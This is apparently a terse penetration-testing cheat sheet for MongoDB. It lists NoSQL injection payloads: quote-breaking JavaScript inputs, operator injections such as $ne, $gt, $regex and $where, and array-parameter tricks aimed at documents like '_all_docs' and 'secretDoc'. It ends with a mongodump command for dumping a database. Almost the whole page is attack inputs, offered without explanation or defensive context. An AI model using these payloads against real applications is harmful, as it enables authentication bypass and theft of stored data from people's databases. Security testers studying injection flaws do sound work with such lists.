Skip to content

MongoDB

Mongo

Example Payloads:

' || 'a'=='a
‘; return ‘’ == ‘
password[%24ne]=
key[]=foo&key[]=1117542887
{'$gt': “”}
{"$ne": 1}
{"$regex": 1}
{"$where": 1}
user[]=_all_docs
user[]=secretDoc

Dump mongoDB:

mongodump --host 127.0.0.1